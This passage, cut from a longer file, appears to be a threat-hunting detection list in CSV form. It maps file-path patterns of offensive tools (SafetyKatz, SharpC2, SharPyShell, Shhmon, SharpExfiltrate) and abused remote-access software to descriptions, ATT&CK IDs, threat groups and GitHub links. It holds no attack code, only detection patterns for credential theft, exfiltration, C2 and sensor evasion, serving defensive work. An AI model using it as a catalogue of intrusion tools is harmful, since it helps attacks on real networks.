T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt 
Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,0,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*\rusthound.exe*,offensive_tool_keyword,RustHound,Active Directory data collector for BloodHound written in Rust,T1087.002 - T1018 - T1059.003,TA0007 - TA0001 - TA0002,N/A,N/A,AD Enumeration,https://github.com/OPENCYBER-FR/RustHound,1,0,N/A,9,7,676,56,2023-08-31T08:35:38Z,2022-10-12T05:54:35Z -*\SafetyKatz*,offensive_tool_keyword,SafetyKatz,SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. 
removing the file after execution is complete,T1003 - T1055 - T1059 - T1574,TA0002 - TA0003 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/SafetyKatz,1,0,N/A,10,10,1101,244,2019-10-01T16:47:21Z,2018-07-24T17:44:15Z -*\samantha.txt,offensive_tool_keyword,cobaltstrike,Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/BOF-RegSave,1,1,N/A,10,10,171,29,2020-10-08T17:29:02Z,2020-10-07T13:46:03Z -*\save_reg.hive*,offensive_tool_keyword,regreeper,gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. 
RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.,T1050.005 - T1012 - T1112 - T1553.002 - T1053.005,TA0005 - TA0003 - TA0007,N/A,N/A,Defense Evasion - Persistence,https://github.com/tccontre/Reg-Restore-Persistence-Mole,1,0,N/A,10,1,46,15,2023-08-23T11:34:26Z,2023-08-03T14:47:45Z -*\scanACLsResults.csv*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,0,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*\scmuacbypass.cpp*,offensive_tool_keyword,SCMUACBypass,SCM UAC Bypass,T1548.002 - T1088,TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/SCMUACBypass,1,0,N/A,8,1,57,9,2023-09-05T17:24:49Z,2023-09-04T13:11:17Z -*\scmuacbypass.exe*,offensive_tool_keyword,SCMUACBypass,SCM UAC Bypass,T1548.002 - T1088,TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/SCMUACBypass,1,0,N/A,8,1,57,9,2023-09-05T17:24:49Z,2023-09-04T13:11:17Z -*\SCMUACBypass\*,offensive_tool_keyword,SCMUACBypass,SCM UAC Bypass,T1548.002 - T1088,TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/SCMUACBypass,1,0,N/A,8,1,57,9,2023-09-05T17:24:49Z,2023-09-04T13:11:17Z -*\ScreenConnect.Client.exe*,greyware_tool_keyword,ScreenConnect,control remote servers - abused by threat actors,T1021.001 - T1078 - T1133 - T1112,TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010,N/A,N/A,RMM,screenconnect.com,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*\ScreenConnect.ClientService.exe*,greyware_tool_keyword,ScreenConnect,control remote servers - abused by threat actors,T1021.001 - T1078 - T1133 - T1112,TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010,N/A,N/A,RMM,https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*\ScreenConnect.ClientSetup.exe*,greyware_tool_keyword,ScreenConnect,control remote servers - 
abused by threat actors,T1021.001 - T1078 - T1133 - T1112,TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010,N/A,N/A,RMM,https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*\ScreenConnect.WindowsBackstageShell.exe*,greyware_tool_keyword,ScreenConnect,control remote servers - abused by threat actors,T1021.001 - T1078 - T1133 - T1112,TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010,N/A,N/A,RMM,https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*\ScreenConnect.WindowsClient.exe*,greyware_tool_keyword,ScreenConnect,control remote servers - abused by threat actors,T1021.001 - T1078 - T1133 - T1112,TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010,N/A,N/A,RMM,https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*\ScriptSentry.ps1*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,0,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*\ScriptSentry.psd1*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,0,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*\ScriptSentry.psm1*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,0,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*\ScriptSentry.txt*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential 
Access,https://github.com/techspence/ScriptSentry,1,0,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*\Seatbelt.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*\Seatbelt\Commands\*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,N/A,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*\ServerC2.cpp*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,0,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*\ServerC2.exe*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,0,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*\ServerC2\ServerC2.*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,0,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*\servers\dns_server.py*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - 
DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*\servers\icmp_server.py*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*\servers\smb_server.py*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*\SessionSearcher.csproj*,offensive_tool_keyword,SessionSearcher,Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details,T1552.004 - T1083 - T1114.001,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*\SessionSearcher.exe*,offensive_tool_keyword,SessionSearcher,Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details,T1552.004 - T1083 - T1114.001,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*\shadowcoerce.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - 
T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*\ShadowSpray\*.cs*,offensive_tool_keyword,ShadowSpray,A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.,T1110.003 - T1098 - T1059 - T1075,TA0001 - TA0008 - TA0009,N/A,N/A,Discovery,https://github.com/ShorSec/ShadowSpray,1,0,N/A,7,5,408,72,2022-10-14T13:36:51Z,2022-10-10T08:34:07Z -*\Sharefinder.ps1*,offensive_tool_keyword,powersploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*\SharpAzbelt.csproj*,offensive_tool_keyword,SharpAzbelt,This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources,T1082 - T1003 - T1027 - T1110 - T1078,TA0006 - TA0007 - TA0005 - TA0004 - TA0003,N/A,N/A,Discovery - Collection,https://github.com/redskal/SharpAzbelt,1,0,N/A,8,1,23,6,2023-09-21T21:47:32Z,2023-09-21T21:44:03Z -*\SharpAzbelt.exe*,offensive_tool_keyword,SharpAzbelt,This is an attempt to port Azbelt by Leron Gray from Nim to C#. 
It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources,T1082 - T1003 - T1027 - T1110 - T1078,TA0006 - TA0007 - TA0005 - TA0004 - TA0003,N/A,N/A,Discovery - Collection,https://github.com/redskal/SharpAzbelt,1,0,N/A,8,1,23,6,2023-09-21T21:47:32Z,2023-09-21T21:44:03Z -*\SharpAzbelt.sln*,offensive_tool_keyword,SharpAzbelt,This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources,T1082 - T1003 - T1027 - T1110 - T1078,TA0006 - TA0007 - TA0005 - TA0004 - TA0003,N/A,N/A,Discovery - Collection,https://github.com/redskal/SharpAzbelt,1,0,N/A,8,1,23,6,2023-09-21T21:47:32Z,2023-09-21T21:44:03Z -*\SharpC2*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*\SharpDomainSpraty\*,offensive_tool_keyword,SharpDomainSpray,Basic password spraying tool for internal tests and red teaming,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/HunnicCyber/SharpDomainSpray,1,0,N/A,10,1,91,18,2020-03-21T09:17:48Z,2019-06-05T10:47:05Z -*\SharpDoor.cs*,offensive_tool_keyword,SharpDoor,SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.,T1076 - T1059 - T1085 - T1070.004,TA0008 - TA0002 - TA0009,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/SharpDoor,1,0,N/A,7,3,298,64,2019-09-30T16:11:24Z,2019-09-29T02:24:07Z -*\SharpEfsPotato*,offensive_tool_keyword,SharpEfsPotato,Local privilege escalation from SeImpersonatePrivilege using EfsRpc.,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege 
Escalation,https://github.com/bugch3ck/SharpEfsPotato,1,0,N/A,10,3,241,40,2022-10-17T12:35:06Z,2022-10-17T12:20:47Z -*\SharpExfiltrate\*,offensive_tool_keyword,SharpExfiltrate,Modular C# framework to exfiltrate loot over secure and trusted channels.,T1027 - T1567 - T1561,TA0010 - TA0040 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/Flangvik/SharpExfiltrate,1,0,N/A,10,2,116,26,2021-09-12T17:08:02Z,2021-09-08T13:17:00Z -*\SharpGmailC2*,offensive_tool_keyword,SharpGmailC2,Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol,T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001,TA0011 - TA0040 - TA0001,N/A,N/A,C2,https://github.com/reveng007/SharpGmailC2,1,0,N/A,10,10,242,40,2022-12-27T01:45:46Z,2022-11-10T06:48:15Z -*\SharpHoundCommon\*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*\SharpMove.exe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Lateral Movement,T1021.002 - T1021.006 - T1021.004,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/MoveKit,1,1,N/A,10,7,615,114,2020-02-21T20:23:45Z,2020-01-24T22:19:16Z -*\SharpNoPSExec*,offensive_tool_keyword,SharpNoPSExec,Get file less command execution for lateral movement.,T1021.006 - T1059.003 - T1105,TA0008 - TA0002 - TA0011,N/A,N/A,Lateral Movement,https://github.com/juliourena/SharpNoPSExec,1,0,N/A,10,6,567,85,2022-06-03T10:32:55Z,2021-04-24T22:02:38Z -*\SharpRDPHijack*,offensive_tool_keyword,SharpRDPHijack,SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions,T1021.001 - T1078.003 - T1059.001,TA0002 - TA0008 - TA0006,N/A,N/A,Lateral Movement - Sniffing & 
Spoofing,https://github.com/bohops/SharpRDPHijack,1,0,N/A,10,4,382,84,2021-07-25T17:36:01Z,2020-07-06T02:59:46Z -*\SharpSpray.exe*,offensive_tool_keyword,SharpDomainSpray,Basic password spraying tool for internal tests and red teaming,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/HunnicCyber/SharpDomainSpray,1,0,N/A,10,1,91,18,2020-03-21T09:17:48Z,2019-06-05T10:47:05Z -*\SharpTerminator.csproj*,offensive_tool_keyword,SharpTerminator,Terminate AV/EDR Processes using kernel driver,T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001,TA0007 - TA0008 - TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/mertdas/SharpTerminator,1,0,N/A,N/A,3,266,53,2023-06-12T00:38:54Z,2023-06-11T06:35:51Z -*\SharPyShell*,offensive_tool_keyword,SharPyShell,SharPyShell - tiny and obfuscated ASP.NET webshell for C# web,T1100 - T1059 - T1505,TA0002 - TA0003 - TA0004,N/A,N/A,Web Attacks,https://github.com/antonioCoco/SharPyShell,1,1,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z -*\shellcode_loader.dll*,offensive_tool_keyword,GadgetToJScript,A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.,T1059.001 - T1078 - T1059.005,TA0002 - TA0004 - TA0001,N/A,N/A,Exploitation tools,https://github.com/med0x2e/GadgetToJScript,1,0,N/A,10,8,777,157,2021-07-26T17:35:40Z,2019-10-05T12:27:19Z -*\shellcode_samples\*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*\sherlock.exe*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell 
processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,0,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z -*\Shhmon.*,offensive_tool_keyword,shhmon,Neutering Sysmon via driver unload,T1518.001 ,TA0007,N/A,N/A,Defense Evasion,https://github.com/matterpreter/Shhmon,1,1,N/A,N/A,3,210,35,2022-10-13T16:56:41Z,2019-09-12T14:13:19Z -*\Siber Systems\GoodSync\*,greyware_tool_keyword,Goodsync,GoodSync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://www.goodsync.com/,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*\SigFlip.exe*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,0,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z 
-*\sigthief.exe*,offensive_tool_keyword,metatwin,The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another,T1553.002 - T1114.001 - T1564.003,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/threatexpress/metatwin,1,0,N/A,9,4,303,72,2022-05-18T18:32:51Z,2017-10-08T13:26:00Z -*\SilentClean.exe*,offensive_tool_keyword,cobaltstrike,New UAC bypass for Silent Cleanup for CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/UAC-SilentClean,1,0,N/A,10,10,173,32,2021-07-14T13:51:02Z,2020-10-07T13:25:21Z -*\SilentProcessExit.sln*,offensive_tool_keyword,LsassSilentProcessExit,Command line interface to dump LSASS memory to disk via SilentProcessExit,T1003.001 - T1059.003,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/deepinstinct/LsassSilentProcessExit,1,0,N/A,10,5,421,64,2020-12-23T11:51:21Z,2020-11-29T08:49:42Z -*\SillyRAT\*.py,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - 
T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*\SimpleLoader.cpp*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,0,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*\SimpleLoader.exe*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,0,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*\sitadel.log*,offensive_tool_keyword,Sitadel,Web Application Security Scanner,T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001,TA0001 - TA0007 - TA0043 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/shenril/Sitadel,1,0,N/A,N/A,6,516,111,2020-01-21T14:59:40Z,2018-01-17T09:06:24Z -*\SMB_RPC\*.py,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*\smuggler.py*,offensive_tool_keyword,smuggler.py,HTML Smuggling Generator,T1564.001 - T1027 - T1566,TA0005,N/A,N/A,Phishing - Defense Evasion,https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py,1,0,N/A,9,3,228,42,2023-06-14T02:13:19Z,2023-01-15T22:37:34Z -*\sniff.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*\SoftPerfect Network Scanner*,greyware_tool_keyword,netscan,SoftPerfect Network Scanner abused by threat actor,T1040 - T1046 - T1018,TA0007 - TA0010 - TA0001,N/A,N/A,Network Exploitation tools,https://www.softperfect.com/products/networkscanner/,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*\spacerunner.exe*,greyware_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense 
